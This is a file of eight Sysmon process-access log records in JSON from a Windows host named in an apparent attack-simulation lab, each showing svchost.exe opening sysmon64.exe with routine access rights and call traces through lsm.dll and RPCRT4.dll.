{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1894,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1895,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1896,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1897,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1898,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1899,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1900,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1901,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
